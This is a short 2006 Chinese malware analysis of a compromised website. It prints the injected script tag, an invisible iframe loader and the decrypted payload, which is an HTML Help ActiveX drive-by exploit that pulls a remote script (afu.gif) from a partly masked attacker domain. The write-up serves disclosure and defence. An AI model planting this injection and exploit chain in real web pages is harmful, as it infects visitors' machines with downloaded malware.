又发现一个带毒网站(第2版)

王朝other·作者佚名  2006-03-20
窄屏简体版  字體: |||超大  

endurer原创

2006-03-16第2版补充:Kaspersky对afu.gif的反应。

2006-03-14第1版

首页被插入代码:

<script language="javascript" src="http://www.***3core.com/images/gif.js">

http://www.***3core.com/images/gif.js的代码为:

document.write("<iframe src=http://www.***3core.com/images/error.htm width=0 height=0></iframe>");

http://www.***3core.com/images/error.htm(Kaspersky报为Trojan-Downloader.JS.Agent.e)的内容为加密的脚本,解密后为:

<!--

var Words ="<script>document.write(unescape('<HTML>

<head>

</head>

<BODY>

<div style="display:none">

<OBJECT id="f1"

type="application/x-oleobject"

classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

<PARAM name="Command" value="Related Topics, MENU">

<PARAM name="Window" value="$global_ifl">

<PARAM name="Item1" value='command;file://c:\WINDOWS\Help\apps.chm'>

</OBJECT>

<OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

<PARAM name="Command" value="Related Topics, MENU">

<PARAM name="Window" value="$global_ifl">

<PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT language%20%3D%20JScript src=\\\"http://www.***3core.com/images/afu.gif\""+String.fromCharCode(62)+"</SCR\"+\"IPT\"+String.fromCharCode(62))")'>

</OBJECT>

</div>

<script>

f1.Click();setTimeout("f2.Click();",0);

</script>

</BODY>

</HTML>'));</script>"

function OutWord()

{

var NewWords;

NewWords = unescape(Words);

document.write(NewWords);

}

OutWord();

// -->

这个error.htm的内容与

小心借情人节传播的QQ尾巴

中的afu.htm相似,同样是下载一个名为afu.gif的文件。

Kaspersky将afu.gif报为Exploit.VBS.Phel.bq

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有  導航